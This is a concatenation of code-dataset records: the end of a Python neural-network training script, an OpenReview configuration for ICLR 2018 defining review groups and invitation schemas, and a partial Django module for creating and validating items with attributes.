len(self.layer_dict)):\r\n print(\"Layer: {}\".format(i+1))\r\n self.layer_dict[i+1].print_debug()\r\n\r\ndef start_visualization(vn, network, name):\r\n print(\"Starting: {}\".format(name))\r\n vn.start_graphics(network, name)\r\n \r\nif __name__ == \"__main__\":\r\n #np.random.seed(1)\r\n\r\n problem = np.array([3,3,4,1,4,3,5,2])\r\n target = np.array([3,4,1,5,2])\r\n guess = np.array([1,2,3,4,5])\r\n\r\n n1_number_of_inputs = problem.size\r\n \r\n n1_layer1_number_of_neurons = 5\r\n n1_layer2_number_of_neurons = target.size\r\n\r\n activations_n1_layer1 = np.ones(n1_layer1_number_of_neurons, dtype=np.int8)\r\n activations_n1_layer2 = np.ones(n1_layer2_number_of_neurons, dtype=np.int8)\r\n \r\n n1_layer1 = NetworkLayer(n1_number_of_inputs, n1_layer1_number_of_neurons, activations_n1_layer1)\r\n n1_layer2 = NetworkLayer(n1_layer1_number_of_neurons, n1_layer2_number_of_neurons, activations_n1_layer2)\r\n\r\n n1_layers = [n1_layer1, n1_layer2]\r\n n1 = NeuralNetwork(n1_layers)\r\n\r\n n2_number_of_inputs = target.size + 1\r\n\r\n n2_layer1_number_of_neurons = 5\r\n n2_layer2_number_of_neurons = 5\r\n n2_layer3_number_of_neurons = 1\r\n\r\n activations_n2_layer1 = np.ones(n2_layer1_number_of_neurons, dtype=np.int8)\r\n activations_n2_layer2 = np.ones(n2_layer2_number_of_neurons, dtype=np.int8)\r\n activations_n2_layer3 = np.ones(n2_layer3_number_of_neurons, dtype=np.int8)\r\n\r\n n2_layer1 = NetworkLayer(n2_number_of_inputs, n2_layer1_number_of_neurons, activations_n2_layer1)\r\n n2_layer2 = NetworkLayer(n2_layer1_number_of_neurons, n2_layer2_number_of_neurons, activations_n2_layer2)\r\n n2_layer3 = NetworkLayer(n2_layer2_number_of_neurons, n2_layer3_number_of_neurons, activations_n2_layer3)\r\n\r\n n2_layers = [n2_layer1, n2_layer2, n2_layer3]\r\n n2 = NeuralNetwork(n2_layers)\r\n n2.set_d_factors()\r\n\r\n debug = False\r\n\r\n # =========== Start Visualizing Network ===========\r\n vn1 = VisualizeNetwork()\r\n vn2 = VisualizeNetwork()\r\n\r\n process1 = mp.Process(target=start_visualization, args=(vn1, n1, \"N1\"))\r\n process2 = mp.Process(target=start_visualization, args=(vn2, n2, \"N2\"))\r\n\r\n process1.start()\r\n process2.start()\r\n # ========= End Visualizing Network ==========\r\n\r\n print(\"Starting training\")\r\n\r\n if(debug):\r\n n1.print_debug()\r\n print(\"\")\r\n n2.print_debug()\r\n\r\n last_guess = guess\r\n counter = 0\r\n while(np.array_equal(target, guess) != True):\r\n n0 = target - guess\r\n\r\n #n1.print_debug()\r\n # update activation functions\r\n for i in range(0, n1.total_number_of_neurons):\r\n output_n2, d_weight = n2.get_activation(i, n0)\r\n n1.activation_decisions[i] = d_weight\r\n #print(output_n2)\r\n if(n2.change_activation(output_n2, i, d_weight)):\r\n count = 0\r\n id = i\r\n for l in np.nditer(n1.neurons_in_layers):\r\n if(l > id):\r\n n1.layer_dict[int(count + 1)].activations[int(id)] = output_n2\r\n n2.d_factors[int(i)] = d_weight\r\n break\r\n else:\r\n id -= l\r\n count += 1\r\n #n1.print_debug()\r\n\r\n output_n1 = n1.run_network(problem)\r\n d_weight, d_pos = n1.get_suggestion(output_n1)\r\n\r\n pos = n1.make_decision(d_weight)\r\n print(guess,\"\\n\")\r\n last_guess = guess\r\n '''if(pos != None):\r\n guess[d_pos], guess[pos] = guess[pos], guess[d_pos]'''\r\n for i in range(0, len(guess)):\r\n if(guess[i] == d_pos + 1):\r\n if(pos != None):\r\n guess[pos], guess[i] = guess[i], guess[pos]\r\n\r\n print(guess,\"\\n\")\r\n\r\n '''for i in range(0, n1.total_number_of_neurons):\r\n input_n2_temp = np.append(n0, i)\r\n #n2.train(target, 
input_n2_temp, n1.activation_decisions[i], 1)\r\n #n2.train(input_n2_temp, target, guess, n0, n1.activation_decisions[i], 1, True)'''\r\n\r\n #n1.train(target, problem, guess, 1)\r\n #n1.train(problem, target, guess, n0, guess, 1, False)\r\n n1.train(problem, target, guess, 0.1, 1)\r\n n2.mutate()\r\n\r\n if(np.array_equal(last_guess, guess)):\r\n counter += 1\r\n if(counter > 9):\r\n counter = 0\r\n n1.mutate()\r\n print(\"mutated\")\r\n \r\n #input(\"Press Enter...\")\r\n \r\n \r\n","sub_path":"NeuralNetworkFirstTest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"431414215","text":"#!/usr/bin/python\n\nimport sys, os, copy\n\n\"\"\"\nGROUPS\n\nDefines constants for CONF (the name of the conference), and for the names of each group.\nAll other groups will be named by joining the name with CONF: /\n\nExample:\n\n CONF = 'my.conference/2017'\n PROGRAM_CHAIRS = 'Program_Chairs'\n\n --> my.conference/2017/Program_Chairs\n\n\"\"\"\n\nCONF = \"ICLR.cc/2018/Conference\"\nADMIN = CONF + '/Admin'\nPROGRAM_CHAIRS = CONF + '/Program_Chairs'\n\nAUTHORS = CONF + '/Authors'\n\nAREA_CHAIRS = CONF + '/Area_Chairs'\nAREA_CHAIRS_INVITED = AREA_CHAIRS + '/Invited'\nAREA_CHAIRS_DECLINED = AREA_CHAIRS + '/Declined'\nAREA_CHAIRS_EMAILED = AREA_CHAIRS + '/Emailed'\n\nREVIEWERS = CONF + '/Reviewers'\nREVIEWERS_INVITED = REVIEWERS + '/Invited'\nREVIEWERS_DECLINED = REVIEWERS + '/Declined'\nREVIEWERS_EMAILED = REVIEWERS + '/Emailed'\n\nAUTHORS_PLUS = AUTHORS + '_and_Higher'\nREVIEWERS_PLUS = REVIEWERS + '_and_Higher'\nAREA_CHAIRS_PLUS = AREA_CHAIRS + '_and_Higher'\n\nDUE_TIMESTAMP = 1509138000000 # 17:00:00 EST on October 27, 2017\nWEBPATH = os.path.join(os.path.dirname(__file__), '../webfield/conferenceWebfield_tabs.js')\n\n\"\"\"\nINVITATIONS\n\nDefines constants for various invitations.\nThe full name of an invitation will be generated by joining the name with CONF by \"/-/\": /-/\n\nExample:\n\n CONF = 'my.conference/2017'\n SUBMISSION = 'Submission'\n\n --> my.conference/2017/-/Submission\n\nPARAMETERS\n\nDictionaries that represent argument combinations defining Group and Invitation permissions.\n\nExample:\n\n restricted = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'signatories': [CONF],\n }\n\n The \"restricted\" configuration above will only allow the CONF group to read, write, and sign\n for the newly created Group that uses it.\n\"\"\"\n\ngroup_params = {\n 'readers': [CONF, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\npublic_group_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\nprogram_chairs_params = {\n 'readers': [CONF, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF, PROGRAM_CHAIRS],\n 'signatures': [CONF],\n 'web': os.path.join(os.path.dirname(__file__), '../webfield/programchairWebfield.js'),\n}\n\narea_chairs_params = {\n 'readers': [CONF, PROGRAM_CHAIRS, AREA_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF],\n 'web': os.path.join(os.path.dirname(__file__), '../webfield/areachairWebfield.html'),\n}\n\nreviewer_group_params = {\n 'readers': [CONF, AREA_CHAIRS, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\n\n\"\"\"\n/-/Submission\n\nThis is the invitation that users submit to. These are un-blinded notes. 
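The group- and invitation-naming convention that this config.py sample documents can be checked in isolation. Below is a minimal, self-contained sketch that uses only the convention stated in the sample (group IDs join CONF with '/', invitation IDs with '/-/'); the helper names group_id and invitation_id are illustrative and do not appear in the source.

# Illustrates the ID convention the config file documents:
#   groups:       <CONF>/<name>
#   invitations:  <CONF>/-/<name>
CONF = 'ICLR.cc/2018/Conference'

def group_id(name):
    # e.g. 'ICLR.cc/2018/Conference/Program_Chairs'
    return '/'.join([CONF, name])

def invitation_id(name):
    # e.g. 'ICLR.cc/2018/Conference/-/Submission'
    return CONF + '/-/' + name

print(group_id('Program_Chairs'))
print(invitation_id('Blind_Submission'))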
The process\nfunction generates a /-/Blind_Submission note.\n\n\"\"\"\nSUBMISSION = CONF + '/-/Submission'\n\nsubmission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': ['~'],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/submissionProcess.js'),\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values-copied': [CONF, PROGRAM_CHAIRS, '{content.authorids}', '{signatures}']\n },\n 'signatures': {\n 'description': 'Your authorized identity to be associated with the above content.',\n 'values-regex': '~.*|' + CONF\n },\n 'writers': {\n 'values': [CONF]\n },\n 'content':{\n 'title': {\n 'description': 'Title of paper.',\n 'order': 1,\n 'value-regex': '.{1,250}',\n 'required':True\n },\n 'authors': {\n 'description': 'Comma separated list of author names. Please provide real names; identities will be anonymized.',\n 'order': 2,\n 'values-regex': \"[^;,\\\\n]+(,[^,\\\\n]+)*\",\n 'required':True\n },\n 'authorids': {\n 'description': 'Comma separated list of author email addresses, lowercased, in the same order as above. For authors with existing OpenReview accounts, please make sure that the provided email address(es) match those listed in the author\\'s profile. Please provide real emails; identities will be anonymized.',\n 'order': 3,\n 'values-regex': \"([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,},){0,}([a-z0-9_\\-\\.]{2,}@[a-z0-9_\\-\\.]{2,}\\.[a-z]{2,})\",\n 'required':True\n },\n 'keywords': {\n 'description': 'Comma separated list of keywords.',\n 'order': 6,\n 'values-regex': \"(^$)|[^;,\\\\n]+(,[^,\\\\n]+)*\"\n },\n 'TL;DR': {\n 'description': '\\\"Too Long; Didn\\'t Read\\\": a short sentence describing your paper',\n 'order': 7,\n 'value-regex': '[^\\\\n]{0,250}',\n 'required':False\n },\n 'abstract': {\n 'description': 'Abstract of paper.',\n 'order': 8,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'required':True\n },\n 'pdf': {\n 'description': 'Upload a PDF file that ends with .pdf',\n 'order': 9,\n 'value-regex': 'upload',\n 'required':True\n }\n }\n }\n}\n\n\n\"\"\"\n/-/Blind_Submission\n\nThis is the invitation for the blinded version of the submissions.\nEach of these notes have an \"original\" field which points to the non-anonymous\nversion of the note. They are generated by the /-/Submission process function.\n\n\"\"\"\nBLIND_SUBMISSION = CONF + '/-/Blind_Submission'\n\nblind_submission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [CONF]\n },\n 'writers': {\n 'values': [CONF]\n },\n 'content': {\n 'authors': {\n 'description': 'Comma separated list of author names, as they appear in the paper.',\n 'order': 1,\n 'values-regex': '.*',\n 'required': False\n },\n 'authorids': {\n 'description': 'Comma separated list of author email addresses, in the same order as above.',\n 'order': 2,\n 'values-regex': '.*',\n 'required': False\n }\n }\n }\n}\n\n\"\"\"\n/-/Withdrawn_Submission\n\nThis is an invitation that gets fulfilled when a user withdraws a submission\nafter the submission deadline. 
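Once submission_params above is registered as an invitation, an author-side note has to satisfy its reply schema (required title, authors, authorids, abstract, pdf). The sketch below is a hedged illustration of what posting such a note could look like with the openreview-py client; openreview.Client, openreview.Note, post_note, the base URL, and the credentials are assumptions about that client library, not something defined in this config sample, and all author details are placeholders.

import openreview  # assumed: openreview-py client library, not part of this sample

# Hypothetical credentials and base URL.
client = openreview.Client(baseurl='https://api.openreview.net',
                           username='author@example.com', password='...')

# Content keys mirror submission_params['reply']['content'] from the sample above.
note = openreview.Note(
    invitation='ICLR.cc/2018/Conference/-/Submission',
    readers=['ICLR.cc/2018/Conference',
             'ICLR.cc/2018/Conference/Program_Chairs',
             'author@example.com', '~Author_One1'],
    writers=['ICLR.cc/2018/Conference'],
    signatures=['~Author_One1'],
    content={
        'title': 'A Hypothetical Submission',
        'authors': ['Author One'],
        'authorids': ['author@example.com'],
        'abstract': 'Placeholder abstract.',
        'pdf': '/pdf/placeholder.pdf',  # the schema marks this field as an upload
    })
client.post_note(note)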
Setting withdrawals up this way allows us to\neasily put all withdrawn notes in a single tab.\n\n\"\"\"\nWITHDRAWN_SUBMISSION = CONF + '/-/Withdrawn_Submission'\n\nwithdrawn_submission_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [CONF]\n },\n 'writers': {\n 'values': [CONF]\n },\n 'content': {}\n }\n}\n\n\n\"\"\"\n/-/Public_Comment\n\nThis is the invitation for non-anonymous comments made by the public.\nUsers sign using their tilde (~) IDs.\n\"\"\"\nPUBLIC_COMMENT = CONF + '/-/Public_Comment'\n\npublic_comment_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'noninvitees': [REVIEWERS, AREA_CHAIRS, AUTHORS, PROGRAM_CHAIRS],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'),\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'value-dropdown': ['everyone', AUTHORS_PLUS, REVIEWERS_PLUS, AREA_CHAIRS_PLUS, PROGRAM_CHAIRS]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*|\\\\(anonymous\\\\)'\n },\n 'writers': {\n 'values-regex': '~.*|\\\\(anonymous\\\\)'\n },\n 'content':{\n 'title': {\n 'order': 0,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your comment.',\n 'required': True\n },\n 'comment': {\n 'order': 1,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Your comment or reply (max 5000 characters).',\n 'required': True\n }\n }\n }\n}\n\n\n\"\"\"\n/-/Paper[0-9]+/Official_Comment\n\nThis is the invitation for comments by users in official ICLR reviewing\nroles (reviewers, area chairs, or program chairs).\n\n\"\"\"\n\nofficial_comment_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/commentProcess.js'),\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'value-dropdown': ['everyone', AUTHORS_PLUS, REVIEWERS_PLUS, AREA_CHAIRS_PLUS, PROGRAM_CHAIRS]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': ''\n },\n 'writers': {\n 'values-regex': ''\n },\n 'content':{\n 'title': {\n 'order': 0,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your comment.',\n 'required': True\n },\n 'comment': {\n 'order': 1,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Your comment or reply (max 5000 characters).',\n 'required': True\n }\n }\n }\n}\n\n\"\"\"\n/-/Paper[0-9]+/Official_Review\n\nThis is the invitation for official reviews left by invited ICLR 2018 reviewers.\nIt gets posted with toggle-invitations.py, which also assigns it an ID based on paper number.\n\"\"\"\n\nofficial_review_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/officialReviewProcess.js'),\n 'duedate': 1511845199000, # 23:59:59 EST on November 27, 2017\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 
'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': [AREA_CHAIRS_PLUS]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': ''\n },\n 'writers': {\n 'values-regex': ''\n },\n 'content':{\n 'title': {\n 'order': 1,\n 'value-regex': '.{0,500}',\n 'description': 'Brief summary of your review.',\n 'required': True\n },\n 'review': {\n 'order': 2,\n 'value-regex': '[\\\\S\\\\s]{1,200000}',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons (max 200000 characters).',\n 'required': True\n },\n 'rating': {\n 'order': 3,\n 'value-dropdown': [\n '10: Top 5% of accepted papers, seminal paper',\n '9: Top 15% of accepted papers, strong accept',\n '8: Top 50% of accepted papers, clear accept',\n '7: Good paper, accept',\n '6: Marginally above acceptance threshold',\n '5: Marginally below acceptance threshold',\n '4: Ok but not good enough - rejection',\n '3: Clear rejection',\n '2: Strong rejection',\n '1: Trivial or wrong'\n ],\n 'required': True\n },\n 'confidence': {\n 'order': 4,\n 'value-radio': [\n '5: The reviewer is absolutely certain that the evaluation is correct and very familiar with the relevant literature',\n '4: The reviewer is confident but not absolutely certain that the evaluation is correct',\n '3: The reviewer is fairly confident that the evaluation is correct',\n '2: The reviewer is willing to defend the evaluation, but it is quite likely that the reviewer did not understand central parts of the paper',\n '1: The reviewer\\'s evaluation is an educated guess'\n ],\n 'required': True\n }\n }\n }\n}\n\n\"\"\"\n/-/Paper[0-9]+/Meta_Review\n\nThis is the invitation for meta reviews left by invited ICLR 2018 area chairs.\nIt gets posted with toggle-invitations.py, which also assigns it an ID based on paper number.\n\"\"\"\n\nmeta_review_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.join(os.path.dirname(__file__), '../process/metaReviewProcess.js'),\n 'duedate': 1516424399000, # 23:59:59 EST on January 19, 2018\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'writers': {\n 'values-regex': CONF + '.*'\n },\n 'signatures': {\n 'values-regex': CONF + '.*'\n },\n 'readers': {\n 'values': [AREA_CHAIRS_PLUS],\n 'description': 'The users who will be allowed to read the above content.'\n },\n 'nonreaders': {},\n 'content': {\n 'title': {\n 'order': 1,\n 'value-regex': '.{1,500}',\n 'description': 'Brief summary of your review.',\n 'required': True\n },\n 'metareview': {\n 'order': 2,\n 'value-regex': '[\\\\S\\\\s]{1,5000}',\n 'description': 'Please provide an evaluation of the quality, clarity, originality and significance of this work, including a list of its pros and cons.',\n 'required': True\n },\n 'recommendation': {\n 'order': 3,\n 'value-dropdown': [\n 'Accept (Oral)',\n 'Accept (Poster)',\n 'Reject',\n 'Invite to Workshop Track'\n ],\n 'required': True\n },\n 'confidence': {\n 'order': 4,\n 'value-radio': [\n '5: The area chair is absolutely certain',\n '4: The area chair is confident but not absolutely certain',\n '3: The area chair is somewhat confident',\n '2: The area chair is not sure',\n '1: The area chair\\'s evaluation is an educated guess'\n ],\n 'required': True\n }\n }\n }\n};\n\n\"\"\"\n/-/Acceptance_Decision\n\"\"\"\nacceptance_decision_params = {\n 'readers': ['everyone'],\n 
'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'invitation': BLIND_SUBMISSION,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'value-dropdown': ['ICLR.cc/2018/Conference/Program_Chairs', 'everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values': [PROGRAM_CHAIRS]\n },\n 'writers': {\n 'values': [PROGRAM_CHAIRS]\n },\n 'content': {\n 'title': {\n 'order': 1,\n 'value': 'ICLR 2018 Conference Acceptance Decision',\n 'required': True\n },\n 'decision': {\n 'order': 2,\n 'value-dropdown': [\n 'Accept (Oral)',\n 'Accept (Poster)',\n 'Reject',\n 'Invite to Workshop Track'\n ],\n 'required': True\n },\n 'comment': {\n 'order': 3,\n 'value-regex': '[\\\\S\\\\s]{0,5000}',\n 'description': '(optional) Comment on this decision.',\n 'required': False\n },\n }\n }\n}\n\n\n\"\"\"\n/-/Paper[0-9]+/Withdraw_Paper\n\nThis is the invitation for paper withdrawals.\n\"\"\"\n\nwithdraw_paper_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/withdrawProcess_reveal.js')),\n 'reply': {\n 'referent': None, # replaced in invitations.py\n 'forum': None, # replaced in invitations.py\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': ['everyone']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'writers': {\n 'values-regex': '~.*'\n },\n 'content':{\n 'withdrawal': {\n # For withdrawProcess_delete.js:\n #'description': 'Confirm your withdrawal. The blind record of your paper will be deleted. Your identity will NOT be revealed. This cannot be undone.',\n # For withdrawProcess_reveal.js:\n 'description': 'Confirm your withdrawal. Your identity will be revealed to the public. 
This cannot be undone.',\n 'order': 1,\n 'value-radio': ['Confirmed'],\n 'required':True\n }\n }\n }\n}\n\n\"\"\"\n/-/Paper[0-9]+/Add_Revision\n\nThis is the invitation for paper revisions\n\"\"\"\n\nadd_revision_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [], # set during submission process function; replaced in invitations.py\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/addRevisionProcess.js')),\n 'reply': {\n 'forum': None,\n 'referent': None,\n 'signatures': submission_params['reply']['signatures'],\n 'writers': submission_params['reply']['writers'],\n 'readers': submission_params['reply']['readers'],\n 'content': submission_params['reply']['content']\n }\n}\n\n\n\"\"\"\n/-/Add_Bid\n\nThis is the invitation to bid on papers.\n\nThere is a special interface to view bids, defined by the webfield.\n\n\"\"\"\nADD_BID = CONF + '/-/Add_Bid'\n\nadd_bid_params = {\n 'readers': [CONF, PROGRAM_CHAIRS, AREA_CHAIRS, REVIEWERS],\n 'writers': [CONF],\n 'invitees': [],\n 'signatures': [CONF],\n 'duedate': 1509595199000, # 23:59:59 EST on November 1, 2017\n 'web': os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/bidWebfield.js')),\n 'taskCompletionCount': 50,\n 'multiReply': False,\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'invitation': BLIND_SUBMISSION,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values-copied': [CONF, '{signatures}']\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': '~.*'\n },\n 'content': {\n 'tag': {\n 'description': 'Bid description',\n 'order': 1,\n 'value-dropdown': ['I want to review',\n 'I can review',\n 'I can probably review but am not an expert',\n 'I cannot review',\n 'No bid'],\n 'required':True\n }\n }\n }\n}\n\n\n\"\"\"\n/-/Paper_Metadata\n\nThis is the invitation to post paper metadata, used in paper-reviewer matching.\n\n\"\"\"\nMETADATA = CONF + '/-/Paper_Metadata'\n\nmetadata_params = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': [CONF]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': CONF\n },\n 'writers': {\n 'values-regex': CONF\n },\n 'content': {}\n }\n}\n\n\n\n\"\"\"\n/-/Paper_Assignments\n\nThis is the invitation to post assignment notes, used in the paper-reviewer\nmatching system.\n\n\"\"\"\nASSIGNMENTS = CONF + '/-/Paper_Assignments'\n\nassignments_params = {\n 'writers': [CONF],\n 'readers': [CONF],\n 'invitees': [CONF],\n 'signatures': [CONF],\n 'reply': {\n 'forum': None,\n 'replyto': None,\n 'readers': {\n 'description': 'The users who will be allowed to read the above content.',\n 'values': [CONF]\n },\n 'signatures': {\n 'description': 'How your identity will be displayed with the above content.',\n 'values-regex': CONF\n },\n 'writers': {\n 'values-regex': CONF\n }\n }\n}\n\n\n\"\"\"\n/-/Recruit_Area_Chairs\n\nThis is the invitation to recruit area chairs.\n\"\"\"\nRECRUIT_AREA_CHAIRS = CONF + '/-/Recruit_Area_Chairs'\n\nrecruit_area_chairs_params = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'invitees': [AREA_CHAIRS_INVITED],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), 
'../process/recruitAreachairsProcess.js')),\n 'web': os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/recruitAreachairsWebfield.html')),\n 'reply': {\n 'content': {\n 'username': {\n 'description': 'OpenReview username (e.g. ~Alan_Turing1)',\n 'order': 1,\n 'value-regex': '~.*'\n },\n 'key': {\n 'description': 'Email key hash',\n 'order': 2,\n 'value-regex': '.{0,100}'\n },\n 'response': {\n 'description': 'Invitation response',\n 'order': 3,\n 'value-radio': ['Yes', 'No']\n }\n },\n 'readers': {\n 'values': [CONF]\n },\n 'signatures': {\n 'values-regex': '\\\\(anonymous\\\\)'\n },\n 'writers': {\n 'values-regex': '\\\\(anonymous\\\\)'\n }\n }\n}\n\n\n\n\"\"\"\n/-/Recruit_Reviewers\n\nThis is the invitation to recruit reviewers.\n\"\"\"\nRECRUIT_REVIEWERS = CONF + '/-/Recruit_Reviewers'\n\nrecruit_reviewers_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'invitees': [REVIEWERS_INVITED],\n 'signatures': [CONF],\n 'process': os.path.abspath(os.path.join(os.path.dirname(__file__), '../process/recruitReviewersProcess.js')),\n 'web': os.path.abspath(os.path.join(os.path.dirname(__file__), '../webfield/recruitReviewersWebfield.html')),\n 'reply': {\n 'content': {\n 'username': {\n 'description': 'OpenReview username or email address (e.g. ~Alan_Turing1)',\n 'order': 1,\n 'value-regex': '.*'\n },\n 'key': {\n 'description': 'Email key hash',\n 'order': 2,\n 'value-regex': '.{0,100}'\n },\n 'response': {\n 'description': 'Invitation response',\n 'order': 3,\n 'value-radio': ['Yes', 'No']\n }\n },\n 'readers': {\n 'values': [CONF]\n },\n 'signatures': {\n 'values-regex': '\\\\(anonymous\\\\)'\n },\n 'writers': {\n 'values-regex': '\\\\(anonymous\\\\)'\n }\n }\n}\n","sub_path":"venues/ICLR.cc/2018/Conference/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":24890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"338641827","text":"from django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom nepcore.forms.fields import CUSTOM_FIELD_MAP\n\nfrom item.models import ItemType, Item, Attribute, ItemAttribute, ItemAttributeValue\n\nclass Items(object):\n\n def _create_item_attr_relation(self, itemType, attr):\n obj = ItemAttribute(itemType=itemType, attribute=attr)\n obj.save()\n\n def _create_item_attr_value(self, item, attr, value):\n obj = ItemAttributeValue(item=item, attribute=attr, value=value)\n obj.save()\n\n def _is_valid_data(self, dataType, data):\n try:\n field = CUSTOM_FIELD_MAP[dataType]()\n field.clean(data)\n return False\n except ValidationError as e:\n return e.messages[0]\n\nclass HandleItems(Items):\n\n def __init__(self, data):\n self.data = data\n self.errors = []\n\n def _validate_single_fields(self, data):\n errors = {}\n\n for k, v in data.iteritems():\n _id = k\n value = v\n attr_errors = {}\n\n try:\n attr = Attribute.objects.get(id=_id)\n except:\n attr_errors[_id] = 'No attributes exist with given id.'\n\n if not value and value != 0:\n attr_errors['value'] = 'No value given for attribute.'\n\n if attr_errors:\n errors[_id] = attr_errors\n else:\n error = self._is_valid_data(attr.dataType, value)\n if error:\n errors[_id] = error\n\n return errors\n\n @classmethod\n def delete_item(self, itemPK):\n item = Item.objects.get(pk=itemPK)\n item.archived = True\n item.save()\n\n def is_valid(self):\n #validate input for item creation/updating.\n\n self.errors = {}\n validated = True\n\n #expected input for item creation:\n # {\n # 
'itemType': '1',\n # 'itemName': '320d',\n # '232': 'almost grey',\n # '23': 'The fastest diesel',\n # '28': 'Greater than beetle'\n # }\n\n #expected input for item update:\n # {\n # 'itemPK: '1',\n # 'itemType': '1',\n # 'itemName': '320d',\n # '232': 'almost grey',\n # '23': 'The fastest diesel',\n # '28': 'Greater than beetle'\n # }\n\n temp = self.data.copy()\n\n create = True\n\n if 'itemPK' in temp:\n create = False\n del temp['itemPK']\n\n if 'itemType' in temp:\n try:\n ItemType.objects.get(id=temp['itemType'])\n except:\n self.errors['itemType'] ='itemType does not exist.'\n validated = False\n else:\n self.errors['itemType'] = 'No itemType given.'\n validated = False\n\n del temp['itemType']\n\n if 'itemName' not in temp:\n self.errors['itemName'] = 'No itemName given.'\n validated = False\n else:\n del temp['itemName']\n\n attrErrors = self._validate_single_fields(temp)\n\n if attrErrors:\n self.errors = attrErrors\n validated = False\n\n if validated:\n if create:\n self._create_item_with_attributes(self.data)\n return True\n else:\n self._update_item_and_attributes(self.data)\n return True\n else:\n return False\n\n #private methods\n def _create_item(self, name, itemType):\n obj = Item(name=name, itemType=itemType)\n obj.save()\n return obj\n\n def _create_item_with_attributes(self, data):\n #creates item and populate its properties values.\n itemT = ItemType.objects.get(id=data['itemType'])\n item = self._create_item(data['itemName'], itemT)\n\n del data['itemType']\n del data['itemName']\n\n for k, v in data.iteritems():\n attribute = Attribute.objects.get(id=k)\n self._create_item_attr_value(item, attribute, v)\n\n def _update_item_and_attributes(self, data):\n #updates item and its properties values.\n item = Item.objects.get(pk=data['itemPK'])\n itemT = 